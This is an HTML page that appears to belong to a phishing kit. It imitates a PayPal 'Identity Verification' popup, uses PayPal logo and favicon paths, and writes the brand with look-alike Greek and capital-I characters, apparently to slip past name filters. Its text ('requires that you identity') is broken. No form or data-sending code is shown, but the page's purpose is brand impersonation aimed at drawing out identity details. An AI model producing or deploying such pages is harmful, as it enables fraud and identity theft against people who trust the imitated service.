<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Verification - ΡayΡal</title>
<link media="screen" rel="stylesheet" type="text/css" href="../css/global.css">
<link rel="shortcut icon" href="../icon/pp_favicon_x.ico">
</head>
<body>
			<div id="popup"><div id="logo"><h1><img src="../icon/logo_paypal_106x27.png" alt="ΡayΡal" border="0"></h1></div>
<div id="content">
	<div id="headline">
		<h2>Identity Verification</h2>
</div>
<div id="main">
	<p>For your safety and security, ΡayΡal requires that you identity.</p>

<img src="../icon/25.png" alt="" border="0"></div></div></div>
	<p align="right">
		<a href="#" onclick="window.close();return false;">Close Window</a></p>
<div id="footer"> <center>
	<p id="legal">Copyright © 1999-2016 ΡayΡaI. All rights reserved.</p></center></div></div>
</body></html>
